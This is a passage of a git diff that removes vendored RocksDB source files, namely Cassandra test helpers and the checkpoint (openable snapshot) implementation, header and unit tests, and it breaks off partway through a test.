-const int8_t kExpiringColumn = 2;
-
-std::shared_ptr<ColumnBase> CreateTestColumn(int8_t mask,
-                                             int8_t index,
-                                             int64_t timestamp) {
-  if ((mask & ColumnTypeMask::DELETION_MASK) != 0) {
-    return std::shared_ptr<Tombstone>(new Tombstone(
-      mask, index, kLocalDeletionTime, timestamp));
-  } else if ((mask & ColumnTypeMask::EXPIRATION_MASK) != 0) {
-    return std::shared_ptr<ExpiringColumn>(new ExpiringColumn(
-      mask, index, timestamp, sizeof(kExpiringData), kExpiringData, kTtl));
-  } else {
-    return std::shared_ptr<Column>(
-      new Column(mask, index, timestamp, sizeof(kData), kData));
-  }
-}
-
-RowValue CreateTestRowValue(
-    std::vector<std::tuple<int8_t, int8_t, int64_t>> column_specs) {
-  std::vector<std::shared_ptr<ColumnBase>> columns;
-  int64_t last_modified_time = 0;
-  for (auto spec: column_specs) {
-    auto c = CreateTestColumn(std::get<0>(spec), std::get<1>(spec),
-                              std::get<2>(spec));
-    last_modified_time = std::max(last_modified_time, c -> Timestamp());
-    columns.push_back(std::move(c));
-  }
-  return RowValue(std::move(columns), last_modified_time);
-}
-
-RowValue CreateRowTombstone(int64_t timestamp) {
-  return RowValue(kLocalDeletionTime, timestamp);
-}
-
-void VerifyRowValueColumns(
-  std::vector<std::shared_ptr<ColumnBase>> &columns,
-  std::size_t index_of_vector,
-  int8_t expected_mask,
-  int8_t expected_index,
-  int64_t expected_timestamp
-) {
-  EXPECT_EQ(expected_timestamp, columns[index_of_vector]->Timestamp());
-  EXPECT_EQ(expected_mask, columns[index_of_vector]->Mask());
-  EXPECT_EQ(expected_index, columns[index_of_vector]->Index());
-}
-
-int64_t ToMicroSeconds(int64_t seconds) {
-  return seconds * (int64_t)1000000;
-}
-
-}
-}
diff --git a/thirdparty/rocksdb/utilities/cassandra/test_utils.h b/thirdparty/rocksdb/utilities/cassandra/test_utils.h
deleted file mode 100644
index 463b12b..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/test_utils.h
+++ /dev/null
@@ -1,43 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <memory>
-#include "util/testharness.h"
-#include "utilities/cassandra/format.h"
-#include "utilities/cassandra/serialize.h"
-
-namespace rocksdb {
-namespace cassandra {
-extern const char kData[];
-extern const char kExpiringData[];
-extern const int32_t kLocalDeletionTime;
-extern const int32_t kTtl;
-extern const int8_t kColumn;
-extern const int8_t kTombstone;
-extern const int8_t kExpiringColumn;
-
-
-std::shared_ptr<ColumnBase> CreateTestColumn(int8_t mask,
-                                             int8_t index,
-                                             int64_t timestamp);
-
-RowValue CreateTestRowValue(
-    std::vector<std::tuple<int8_t, int8_t, int64_t>> column_specs);
-
-RowValue CreateRowTombstone(int64_t timestamp);
-
-void VerifyRowValueColumns(
-  std::vector<std::shared_ptr<ColumnBase>> &columns,
-  std::size_t index_of_vector,
-  int8_t expected_mask,
-  int8_t expected_index,
-  int64_t expected_timestamp
-);
-
-int64_t ToMicroSeconds(int64_t seconds);
-
-}
-}
diff --git a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.cc b/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.cc
deleted file mode 100644
index 0cdddbd..0000000
--- a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.cc
+++ /dev/null
@@ -1,304 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 Facebook.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file.
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/checkpoint/checkpoint_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <string>
-#include <vector>
-
-#include "db/wal_manager.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "util/file_util.h"
-#include "util/filename.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-Status Checkpoint::Create(DB* db, Checkpoint** checkpoint_ptr) {
-  *checkpoint_ptr = new CheckpointImpl(db);
-  return Status::OK();
-}
-
-Status Checkpoint::CreateCheckpoint(const std::string& checkpoint_dir,
-                                    uint64_t log_size_for_flush) {
-  return Status::NotSupported("");
-}
-
-// Builds an openable snapshot of RocksDB
-Status CheckpointImpl::CreateCheckpoint(const std::string& checkpoint_dir,
-                                        uint64_t log_size_for_flush) {
-  DBOptions db_options = db_->GetDBOptions();
-
-  Status s = db_->GetEnv()->FileExists(checkpoint_dir);
-  if (s.ok()) {
-    return Status::InvalidArgument("Directory exists");
-  } else if (!s.IsNotFound()) {
-    assert(s.IsIOError());
-    return s;
-  }
-
-  ROCKS_LOG_INFO(
-      db_options.info_log,
-      "Started the snapshot process -- creating snapshot in directory %s",
-      checkpoint_dir.c_str());
-  std::string full_private_path = checkpoint_dir + ".tmp";
-  // create snapshot directory
-  s = db_->GetEnv()->CreateDir(full_private_path);
-  uint64_t sequence_number = 0;
-  if (s.ok()) {
-    db_->DisableFileDeletions();
-    s = CreateCustomCheckpoint(
-        db_options,
-        [&](const std::string& src_dirname, const std::string& fname,
-            FileType) {
-          ROCKS_LOG_INFO(db_options.info_log, "Hard Linking %s", fname.c_str());
-          return db_->GetEnv()->LinkFile(src_dirname + fname,
-                                         full_private_path + fname);
-        } /* link_file_cb */,
-        [&](const std::string& src_dirname, const std::string& fname,
-            uint64_t size_limit_bytes, FileType) {
-          ROCKS_LOG_INFO(db_options.info_log, "Copying %s", fname.c_str());
-          return CopyFile(db_->GetEnv(), src_dirname + fname,
-                          full_private_path + fname, size_limit_bytes,
-                          db_options.use_fsync);
-        } /* copy_file_cb */,
-        [&](const std::string& fname, const std::string& contents, FileType) {
-          ROCKS_LOG_INFO(db_options.info_log, "Creating %s", fname.c_str());
-          return CreateFile(db_->GetEnv(), full_private_path + fname, contents);
-        } /* create_file_cb */,
-        &sequence_number, log_size_for_flush);
-    // we copied all the files, enable file deletions
-    db_->EnableFileDeletions(false);
-  }
-
-  if (s.ok()) {
-    // move tmp private backup to real snapshot directory
-    s = db_->GetEnv()->RenameFile(full_private_path, checkpoint_dir);
-  }
-  if (s.ok()) {
-    unique_ptr<Directory> checkpoint_directory;
-    db_->GetEnv()->NewDirectory(checkpoint_dir, &checkpoint_directory);
-    if (checkpoint_directory != nullptr) {
-      s = checkpoint_directory->Fsync();
-    }
-  }
-
-  if (s.ok()) {
-    // here we know that we succeeded and installed the new snapshot
-    ROCKS_LOG_INFO(db_options.info_log, "Snapshot DONE. All is good");
-    ROCKS_LOG_INFO(db_options.info_log, "Snapshot sequence number: %" PRIu64,
-                   sequence_number);
-  } else {
-    // clean all the files we might have created
-    ROCKS_LOG_INFO(db_options.info_log, "Snapshot failed -- %s",
-                   s.ToString().c_str());
-    // we have to delete the dir and all its children
-    std::vector<std::string> subchildren;
-    db_->GetEnv()->GetChildren(full_private_path, &subchildren);
-    for (auto& subchild : subchildren) {
-      std::string subchild_path = full_private_path + "/" + subchild;
-      Status s1 = db_->GetEnv()->DeleteFile(subchild_path);
-      ROCKS_LOG_INFO(db_options.info_log, "Delete file %s -- %s",
-                     subchild_path.c_str(), s1.ToString().c_str());
-    }
-    // finally delete the private dir
-    Status s1 = db_->GetEnv()->DeleteDir(full_private_path);
-    ROCKS_LOG_INFO(db_options.info_log, "Delete dir %s -- %s",
-                   full_private_path.c_str(), s1.ToString().c_str());
-  }
-  return s;
-}
-
-Status CheckpointImpl::CreateCustomCheckpoint(
-    const DBOptions& db_options,
-    std::function<Status(const std::string& src_dirname,
-                         const std::string& src_fname, FileType type)>
-        link_file_cb,
-    std::function<Status(const std::string& src_dirname,
-                         const std::string& src_fname,
-                         uint64_t size_limit_bytes, FileType type)>
-        copy_file_cb,
-    std::function<Status(const std::string& fname, const std::string& contents,
-                         FileType type)>
-        create_file_cb,
-    uint64_t* sequence_number, uint64_t log_size_for_flush) {
-  Status s;
-  std::vector<std::string> live_files;
-  uint64_t manifest_file_size = 0;
-  uint64_t min_log_num = port::kMaxUint64;
-  *sequence_number = db_->GetLatestSequenceNumber();
-  bool same_fs = true;
-  VectorLogPtr live_wal_files;
-
-  bool flush_memtable = true;
-  if (s.ok()) {
-    if (!db_options.allow_2pc) {
-      if (log_size_for_flush == port::kMaxUint64) {
-        flush_memtable = false;
-      } else if (log_size_for_flush > 0) {
-        // If out standing log files are small, we skip the flush.
-        s = db_->GetSortedWalFiles(live_wal_files);
-
-        if (!s.ok()) {
-          return s;
-        }
-
-        // Don't flush column families if total log size is smaller than
-        // log_size_for_flush. We copy the log files instead.
-        // We may be able to cover 2PC case too.
-        uint64_t total_wal_size = 0;
-        for (auto& wal : live_wal_files) {
-          total_wal_size += wal->SizeFileBytes();
-        }
-        if (total_wal_size < log_size_for_flush) {
-          flush_memtable = false;
-        }
-        live_wal_files.clear();
-      }
-    }
-
-    // this will return live_files prefixed with "/"
-    s = db_->GetLiveFiles(live_files, &manifest_file_size, flush_memtable);
-
-    if (s.ok() && db_options.allow_2pc) {
-      // If 2PC is enabled, we need to get minimum log number after the flush.
-      // Need to refetch the live files to recapture the snapshot.
-      if (!db_->GetIntProperty(DB::Properties::kMinLogNumberToKeep,
-                               &min_log_num)) {
-        return Status::InvalidArgument(
-            "2PC enabled but cannot fine the min log number to keep.");
-      }
-      // We need to refetch live files with flush to handle this case:
-      // A previous 000001.log contains the prepare record of transaction tnx1.
-      // The current log file is 000002.log, and sequence_number points to this
-      // file.
-      // After calling GetLiveFiles(), 000003.log is created.
-      // Then tnx1 is committed. The commit record is written to 000003.log.
-      // Now we fetch min_log_num, which will be 3.
-      // Then only 000002.log and 000003.log will be copied, and 000001.log will
-      // be skipped. 000003.log contains commit message of tnx1, but we don't
-      // have respective prepare record for it.
-      // In order to avoid this situation, we need to force flush to make sure
-      // all transactions committed before getting min_log_num will be flushed
-      // to SST files.
-      // We cannot get min_log_num before calling the GetLiveFiles() for the
-      // first time, because if we do that, all the logs files will be included,
-      // far more than needed.
-      s = db_->GetLiveFiles(live_files, &manifest_file_size, flush_memtable);
-    }
-
-    TEST_SYNC_POINT("CheckpointImpl::CreateCheckpoint:SavedLiveFiles1");
-    TEST_SYNC_POINT("CheckpointImpl::CreateCheckpoint:SavedLiveFiles2");
-    db_->FlushWAL(false /* sync */);
-  }
-  // if we have more than one column family, we need to also get WAL files
-  if (s.ok()) {
-    s = db_->GetSortedWalFiles(live_wal_files);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  size_t wal_size = live_wal_files.size();
-
-  // copy/hard link live_files
-  std::string manifest_fname, current_fname;
-  for (size_t i = 0; s.ok() && i < live_files.size(); ++i) {
-    uint64_t number;
-    FileType type;
-    bool ok = ParseFileName(live_files[i], &number, &type);
-    if (!ok) {
-      s = Status::Corruption("Can't parse file name. This is very bad");
-      break;
-    }
-    // we should only get sst, options, manifest and current files here
-    assert(type == kTableFile || type == kDescriptorFile ||
-           type == kCurrentFile || type == kOptionsFile);
-    assert(live_files[i].size() > 0 && live_files[i][0] == '/');
-    if (type == kCurrentFile) {
-      // We will craft the current file manually to ensure it's consistent with
-      // the manifest number. This is necessary because current's file contents
-      // can change during checkpoint creation.
-      current_fname = live_files[i];
-      continue;
-    } else if (type == kDescriptorFile) {
-      manifest_fname = live_files[i];
-    }
-    std::string src_fname = live_files[i];
-
-    // rules:
-    // * if it's kTableFile, then it's shared
-    // * if it's kDescriptorFile, limit the size to manifest_file_size
-    // * always copy if cross-device link
-    if ((type == kTableFile) && same_fs) {
-      s = link_file_cb(db_->GetName(), src_fname, type);
-      if (s.IsNotSupported()) {
-        same_fs = false;
-        s = Status::OK();
-      }
-    }
-    if ((type != kTableFile) || (!same_fs)) {
-      s = copy_file_cb(db_->GetName(), src_fname,
-                       (type == kDescriptorFile) ? manifest_file_size : 0,
-                       type);
-    }
-  }
-  if (s.ok() && !current_fname.empty() && !manifest_fname.empty()) {
-    create_file_cb(current_fname, manifest_fname.substr(1) + "\n",
-                   kCurrentFile);
-  }
-  ROCKS_LOG_INFO(db_options.info_log, "Number of log files %" ROCKSDB_PRIszt,
-                 live_wal_files.size());
-
-  // Link WAL files. Copy exact size of last one because it is the only one
-  // that has changes after the last flush.
-  for (size_t i = 0; s.ok() && i < wal_size; ++i) {
-    if ((live_wal_files[i]->Type() == kAliveLogFile) &&
-        (!flush_memtable ||
-         live_wal_files[i]->StartSequence() >= *sequence_number ||
-         live_wal_files[i]->LogNumber() >= min_log_num)) {
-      if (i + 1 == wal_size) {
-        s = copy_file_cb(db_options.wal_dir, live_wal_files[i]->PathName(),
-                         live_wal_files[i]->SizeFileBytes(), kLogFile);
-        break;
-      }
-      if (same_fs) {
-        // we only care about live log files
-        s = link_file_cb(db_options.wal_dir, live_wal_files[i]->PathName(),
-                         kLogFile);
-        if (s.IsNotSupported()) {
-          same_fs = false;
-          s = Status::OK();
-        }
-      }
-      if (!same_fs) {
-        s = copy_file_cb(db_options.wal_dir, live_wal_files[i]->PathName(), 0,
-                         kLogFile);
-      }
-    }
-  }
-
-  return s;
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.h b/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.h
deleted file mode 100644
index 7deea98..0000000
--- a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.h
+++ /dev/null
@@ -1,55 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/checkpoint.h"
-
-#include <string>
-#include "rocksdb/db.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-
-class CheckpointImpl : public Checkpoint {
- public:
-  // Creates a Checkpoint object to be used for creating openable snapshots
-  explicit CheckpointImpl(DB* db) : db_(db) {}
-
-  // Builds an openable snapshot of RocksDB on the same disk, which
-  // accepts an output directory on the same disk, and under the directory
-  // (1) hard-linked SST files pointing to existing live SST files
-  // SST files will be copied if output directory is on a different filesystem
-  // (2) a copied manifest files and other files
-  // The directory should not already exist and will be created by this API.
-  // The directory will be an absolute path
-  using Checkpoint::CreateCheckpoint;
-  virtual Status CreateCheckpoint(const std::string& checkpoint_dir,
-                                  uint64_t log_size_for_flush) override;
-
-  // Checkpoint logic can be customized by providing callbacks for link, copy,
-  // or create.
-  Status CreateCustomCheckpoint(
-      const DBOptions& db_options,
-      std::function<Status(const std::string& src_dirname,
-                           const std::string& fname, FileType type)>
-          link_file_cb,
-      std::function<Status(const std::string& src_dirname,
-                           const std::string& fname, uint64_t size_limit_bytes,
-                           FileType type)>
-          copy_file_cb,
-      std::function<Status(const std::string& fname,
-                           const std::string& contents, FileType type)>
-          create_file_cb,
-      uint64_t* sequence_number, uint64_t log_size_for_flush);
-
- private:
-  DB* db_;
-};
-
-}  //  namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_test.cc b/thirdparty/rocksdb/utilities/checkpoint/checkpoint_test.cc
deleted file mode 100644
index 56c8c6e..0000000
--- a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_test.cc
+++ /dev/null
@@ -1,595 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Syncpoint prevents us building and running tests in release
-#ifndef ROCKSDB_LITE
-
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-#include <iostream>
-#include <thread>
-#include <utility>
-#include "db/db_impl.h"
-#include "port/stack_trace.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-class CheckpointTest : public testing::Test {
- protected:
-  // Sequence of option configurations to try
-  enum OptionConfig {
-    kDefault = 0,
-  };
-  int option_config_;
-
- public:
-  std::string dbname_;
-  std::string alternative_wal_dir_;
-  Env* env_;
-  DB* db_;
-  Options last_options_;
-  std::vector<ColumnFamilyHandle*> handles_;
-
-  CheckpointTest() : env_(Env::Default()) {
-    env_->SetBackgroundThreads(1, Env::LOW);
-    env_->SetBackgroundThreads(1, Env::HIGH);
-    dbname_ = test::TmpDir(env_) + "/db_test";
-    alternative_wal_dir_ = dbname_ + "/wal";
-    auto options = CurrentOptions();
-    auto delete_options = options;
-    delete_options.wal_dir = alternative_wal_dir_;
-    EXPECT_OK(DestroyDB(dbname_, delete_options));
-    // Destroy it for not alternative WAL dir is used.
-    EXPECT_OK(DestroyDB(dbname_, options));
-    db_ = nullptr;
-    Reopen(options);
-  }
-
-  ~CheckpointTest() {
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    rocksdb::SyncPoint::GetInstance()->LoadDependency({});
-    rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-    Close();
-    Options options;
-    options.db_paths.emplace_back(dbname_, 0);
-    options.db_paths.emplace_back(dbname_ + "_2", 0);
-    options.db_paths.emplace_back(dbname_ + "_3", 0);
-    options.db_paths.emplace_back(dbname_ + "_4", 0);
-    EXPECT_OK(DestroyDB(dbname_, options));
-  }
-
-  // Return the current option configuration.
-  Options CurrentOptions() {
-    Options options;
-    options.env = env_;
-    options.create_if_missing = true;
-    return options;
-  }
-
-  void CreateColumnFamilies(const std::vector<std::string>& cfs,
-                            const Options& options) {
-    ColumnFamilyOptions cf_opts(options);
-    size_t cfi = handles_.size();
-    handles_.resize(cfi + cfs.size());
-    for (auto cf : cfs) {
-      ASSERT_OK(db_->CreateColumnFamily(cf_opts, cf, &handles_[cfi++]));
-    }
-  }
-
-  void CreateAndReopenWithCF(const std::vector<std::string>& cfs,
-                             const Options& options) {
-    CreateColumnFamilies(cfs, options);
-    std::vector<std::string> cfs_plus_default = cfs;
-    cfs_plus_default.insert(cfs_plus_default.begin(), kDefaultColumnFamilyName);
-    ReopenWithColumnFamilies(cfs_plus_default, options);
-  }
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const std::vector<Options>& options) {
-    ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-  }
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const Options& options) {
-    ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-  }
-
-  Status TryReopenWithColumnFamilies(
-      const std::vector<std::string>& cfs,
-      const std::vector<Options>& options) {
-    Close();
-    EXPECT_EQ(cfs.size(), options.size());
-    std::vector<ColumnFamilyDescriptor> column_families;
-    for (size_t i = 0; i < cfs.size(); ++i) {
-      column_families.push_back(ColumnFamilyDescriptor(cfs[i], options[i]));
-    }
-    DBOptions db_opts = DBOptions(options[0]);
-    return DB::Open(db_opts, dbname_, column_families, &handles_, &db_);
-  }
-
-  Status TryReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                     const Options& options) {
-    Close();
-    std::vector<Options> v_opts(cfs.size(), options);
-    return TryReopenWithColumnFamilies(cfs, v_opts);
-  }
-
-  void Reopen(const Options& options) {
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Close() {
-    for (auto h : handles_) {
-      delete h;
-    }
-    handles_.clear();
-    delete db_;
-    db_ = nullptr;
-  }
-
-  void DestroyAndReopen(const Options& options) {
-    // Destroy using last options
-    Destroy(last_options_);
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Destroy(const Options& options) {
-    Close();
-    ASSERT_OK(DestroyDB(dbname_, options));
-  }
-
-  Status ReadOnlyReopen(const Options& options) {
-    return DB::OpenForReadOnly(options, dbname_, &db_);
-  }
-
-  Status TryReopen(const Options& options) {
-    Close();
-    last_options_ = options;
-    return DB::Open(options, dbname_, &db_);
-  }
-
-  Status Flush(int cf = 0) {
-    if (cf == 0) {
-      return db_->Flush(FlushOptions());
-    } else {
-      return db_->Flush(FlushOptions(), handles_[cf]);
-    }
-  }
-
-  Status Put(const Slice& k, const Slice& v, WriteOptions wo = WriteOptions()) {
-    return db_->Put(wo, k, v);
-  }
-
-  Status Put(int cf, const Slice& k, const Slice& v,
-             WriteOptions wo = WriteOptions()) {
-    return db_->Put(wo, handles_[cf], k, v);
-  }
-
-  Status Delete(const std::string& k) {
-    return db_->Delete(WriteOptions(), k);
-  }
-
-  Status Delete(int cf, const std::string& k) {
-    return db_->Delete(WriteOptions(), handles_[cf], k);
-  }
-
-  std::string Get(const std::string& k, const Snapshot* snapshot = nullptr) {
-    ReadOptions options;
-    options.verify_checksums = true;
-    options.snapshot = snapshot;
-    std::string result;
-    Status s = db_->Get(options, k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  std::string Get(int cf, const std::string& k,
-                  const Snapshot* snapshot = nullptr) {
-    ReadOptions options;
-    options.verify_checksums = true;
-    options.snapshot = snapshot;
-    std::string result;
-    Status s = db_->Get(options, handles_[cf], k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-};
-
-TEST_F(CheckpointTest, GetSnapshotLink) {
-  for (uint64_t log_size_for_flush : {0, 1000000}) {
-    Options options;
-    const std::string snapshot_name = test::TmpDir(env_) + "/snapshot";
-    DB* snapshotDB;
-    ReadOptions roptions;
-    std::string result;
-    Checkpoint* checkpoint;
-
-    options = CurrentOptions();
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(DestroyDB(dbname_, options));
-    ASSERT_OK(DestroyDB(snapshot_name, options));
-    env_->DeleteDir(snapshot_name);
-
-    // Create a database
-    Status s;
-    options.create_if_missing = true;
-    ASSERT_OK(DB::Open(options, dbname_, &db_));
-    std::string key = std::string("foo");
-    ASSERT_OK(Put(key, "v1"));
-    // Take a snapshot
-    ASSERT_OK(Checkpoint::Create(db_, &checkpoint));
-    ASSERT_OK(checkpoint->CreateCheckpoint(snapshot_name, log_size_for_flush));
-    ASSERT_OK(Put(key, "v2"));
-    ASSERT_EQ("v2", Get(key));
-    ASSERT_OK(Flush());
-    ASSERT_EQ("v2", Get(key));
-    // Open snapshot and verify contents while DB is running
-    options.create_if_missing = false;
-    ASSERT_OK(DB::Open(options, snapshot_name, &snapshotDB));
-    ASSERT_OK(snapshotDB->Get(roptions, key, &result));
-    ASSERT_EQ("v1", result);
-    delete snapshotDB;
-    snapshotDB = nullptr;
-    delete db_;
-    db_ = nullptr;
-
-    // Destroy original DB
-    ASSERT_OK(DestroyDB(dbname_, options));
-
-    // Open snapshot and verify contents
-    options.create_if_missing = false;
-    dbname_ = snapshot_name;
-    ASSERT_OK(DB::Open(options, dbname_, &db_));
-    ASSERT_EQ("v1", Get(key));
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(DestroyDB(dbname_, options));
-    delete checkpoint;
-
-    // Restore DB name
-    dbname_ = test::TmpDir(env_) + "/db_test";
-  }
-}
-
-TEST_F(CheckpointTest, CheckpointCF) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"one", "two", "three", "four", "five"}, options);
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"CheckpointTest::CheckpointCF:2", "DBImpl::GetLiveFiles:2"},
-       {"DBImpl::GetLiveFiles:1", "CheckpointTest::CheckpointCF:1"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put(0, "Default", "Default"));
-  ASSERT_OK(Put(1, "one", "one"));
-  ASSERT_OK(Put(2, "two", "two"));
-  ASSERT_OK(Put(3, "three", "three"));
-  ASSERT_OK(Put(4, "four", "four"));
-  ASSERT_OK(Put(5, "five", "five"));
-
-  const std::string snapshot_name = test::TmpDir(env_) + "/snapshot";
-  DB* snapshotDB;
-  ReadOptions roptions;
-  std::string result;
-  std::vector<ColumnFamilyHandle*> cphandles;
-
-  ASSERT_OK(DestroyDB(snapshot_name, options));
-  env_->DeleteDir(snapshot_name);
-
-  Status s;
-  // Take a snapshot
-  rocksdb::port::Thread t([&]() {
-    Checkpoint* checkpoint;
-    ASSERT_OK(Checkpoint::Create(db_, &checkpoint));
-    ASSERT_OK(checkpoint->CreateCheckpoint(snapshot_name));
-    delete checkpoint;
-  });
-  TEST_SYNC_POINT("CheckpointTest::CheckpointCF:1");
-  ASSERT_OK(Put(0, "Default", "Default1"));
-  ASSERT_OK(Put(1, "one", "eleven"));
-  ASSERT_OK(Put(2, "two", "twelve"));
-  ASSERT_OK(Put(3, "three", "thirteen"));
-  ASSERT_OK(Put(4, "four", "fourteen"));
-  ASSERT_OK(Put(5, "five", "fifteen"));
-  TEST_SYNC_POINT("CheckpointTest::CheckpointCF:2");
-  t.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_OK(Put(1, "one", "twentyone"));
-  ASSERT_OK(Put(2, "two", "twentytwo"));
-  ASSERT_OK(Put(3, "three", "twentythree"));
-  ASSERT_OK(Put(4, "four", "twentyfour"));
-  ASSERT_OK(Put(5, "five", "twentyfive"));
-  ASSERT_OK(Flush());
-
-  // Open snapshot and verify contents while DB is running
-  options.create_if_missing = false;
-  std::vector<std::string> cfs;
-  cfs=  {kDefaultColumnFamilyName, "one", "two", "three", "four", "five"};
-  std::vector<ColumnFamilyDescriptor> column_families;
-    for (size_t i = 0; i < cfs.size(); ++i) {
-      column_families.push_back(ColumnFamilyDescriptor(cfs[i], options));
-    }
-  ASSERT_OK(DB::Open(options, snapshot_name,
-        column_families, &cphandles, &snapshotDB));
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[0], "Default", &result));
-  ASSERT_EQ("Default1", result);
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[1], "one", &result));
-  ASSERT_EQ("eleven", result);
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[2], "two", &result));
-  for (auto h : cphandles) {
-      delete h;
-  }
-  cphandles.clear();
-  delete snapshotDB;
-  snapshotDB = nullptr;
-  ASSERT_OK(DestroyDB(snapshot_name, options));
-}
-
-TEST_F(CheckpointTest, CheckpointCFNoFlush) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"one", "two", "three", "four", "five"}, options);
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put(0, "Default", "Default"));
-  ASSERT_OK(Put(1, "one", "one"));
-  Flush();
-  ASSERT_OK(Put(2, "two", "two"));
-
-  const std::string snapshot_name = test::TmpDir(env_) + "/snapshot";
-  DB* snapshotDB;
-  ReadOptions roptions;
-  std::string result;
-  std::vector<ColumnFamilyHandle*> cphandles;
-
-  ASSERT_OK(DestroyDB(snapshot_name, options));
-  env_->DeleteDir(snapshot_name);
-
-  Status s;
-  // Take a snapshot
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCallFlush:start", [&](void* arg) {
-        // Flush should never trigger.
-        FAIL();
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  Checkpoint* checkpoint;
-  ASSERT_OK(Checkpoint::Create(db_, &checkpoint));
-  ASSERT_OK(checkpoint->CreateCheckpoint(snapshot_name, 1000000));
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  delete checkpoint;
-  ASSERT_OK(Put(1, "one", "two"));
-  ASSERT_OK(Flush(1));
-  ASSERT_OK(Put(2, "two", "twentytwo"));
-  Close();
-  EXPECT_OK(DestroyDB(dbname_, options));
-
-  // Open snapshot and verify contents while DB is running
-  options.create_if_missing = false;
-  std::vector<std::string> cfs;
-  cfs = {kDefaultColumnFamilyName, "one", "two", "three", "four", "five"};
-  std::vector<ColumnFamilyDescriptor> column_families;
-  for (size_t i = 0; i < cfs.size(); ++i) {
-    column_families.push_back(ColumnFamilyDescriptor(cfs[i], options));
-  }
-  ASSERT_OK(DB::Open(options, snapshot_name, column_families, &cphandles,
-                     &snapshotDB));
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[0], "Default", &result));
-  ASSERT_EQ("Default", result);
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[1], "one", &result));
-  ASSERT_EQ("one", result);
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[2], "two", &result));
-  ASSERT_EQ("two", result);
-  for (auto h : cphandles) {
-    delete h;
-  }
-  cphandles.clear();
-  delete snapshotDB;
-  snapshotDB = nullptr;
-  ASSERT_OK(DestroyDB(snapshot_name, options));
-}
-
-TEST_F(CheckpointTest, CurrentFileModifiedWhileCheckpointing) {
-  const std::string kSnapshotName = test::TmpDir(env_) + "/snapshot";
-  ASSERT_OK(DestroyDB(kSnapshotName, CurrentOptions()));
-  env_->DeleteDir(kSnapshotName);
-
-  Options options = CurrentOptions();
